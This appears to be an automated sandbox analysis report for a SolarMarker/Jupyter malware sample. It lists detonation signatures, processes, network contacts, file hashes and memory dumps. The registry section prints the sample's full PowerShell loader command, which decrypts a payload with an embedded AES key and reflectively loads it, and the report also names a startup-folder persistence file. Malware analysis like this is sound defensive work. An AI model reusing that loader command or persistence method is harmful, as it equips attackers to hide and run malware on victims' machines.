Analysis Overview
SHA256
30fdcbb1f2999987df2eb6b32c6b0863487f3a55dc6ca65b0e9ef14a2234be15
Threat Level: Known bad
The file $RZJBSB5.pdf was found to be: Known bad.
Malicious Activity Summary
Jupyter, SolarMarker
Blocklisted process makes network request
Drops startup file
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2023-02-21 14:00
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-21 13:59
Reported
2023-02-21 14:23
Platform
win10-20230220-en
Max time kernel
599s
Max time network
602s
Command Line
Signatures
Jupyter, SolarMarker
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w2srnyagayd.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]133,165,236,47,97,52,224,19,17,83,18,190,103,228,59,187,224,102,137,106,50,192,211,70,56,15,156,77,135,31,120,97);$A.IV=@([byte]124,49,69,244,29,153,237,162,142,248,178,31,144,35,21,204);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\qkge3jcwqpk.4fiogvf051v'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[tFRnUqM6yokMORTCQTcvWCNIieWokxn21zabD9OzPw40x3pcfb04HUoG0z7TBgb.r2Ha19C5g7CkWUOInFr4I9c9xo2lUSHVWqP2RCpVIUHvcpSfZcOsQQGGs]::crfL33M9t_IvR8F8mDk9Ki72QQRB0VSBdq_bNHIG84_k();\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\.4fiogvf051v | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\.4fiogvf051v\ = "24eeurs1ylq" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open\command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4144 wrote to memory of 3924 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4144 wrote to memory of 3924 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe
"C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| FR | 40.79.141.152:443 | | tcp |
| NL | 88.221.25.155:80 | | tcp |
| PL | 146.70.161.126:80 | 146.70.161.126 | tcp |
| US | 8.8.8.8:53 | 126.161.70.146.in-addr.arpa | udp |
Files
memory/3924-120-0x0000022F52AE0000-0x0000022F52B02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xjrf1x24.5pi.ps1
| Hash | Value |
| --- | --- |
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3924-147-0x0000022F6B0E0000-0x0000022F6B11C000-memory.dmp
memory/3924-158-0x0000022F6B6A0000-0x0000022F6B716000-memory.dmp
memory/3924-163-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-164-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-169-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-170-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-243-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-249-0x0000022F6B190000-0x0000022F6B21E000-memory.dmp
memory/3924-254-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-21 13:59
Reported
2023-02-21 14:23
Platform
win10v2004-20230220-en
Max time kernel
80s
Max time network
149s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2140 wrote to memory of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2140 wrote to memory of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe
"C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 240.232.18.117.in-addr.arpa | udp |
| US | 117.18.237.29:80 | | tcp |
| NL | 173.223.113.131:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfgvnuzf.rbq.ps1
| Hash | Value |
| --- | --- |
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1028-142-0x000002BB60900000-0x000002BB60922000-memory.dmp
memory/1028-143-0x000002BB60980000-0x000002BB609C4000-memory.dmp
memory/1028-144-0x000002BB60DF0000-0x000002BB60E66000-memory.dmp
memory/1028-146-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-145-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-147-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-148-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-149-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-150-0x000002BB456E0000-0x000002BB456F0000-memory.dmp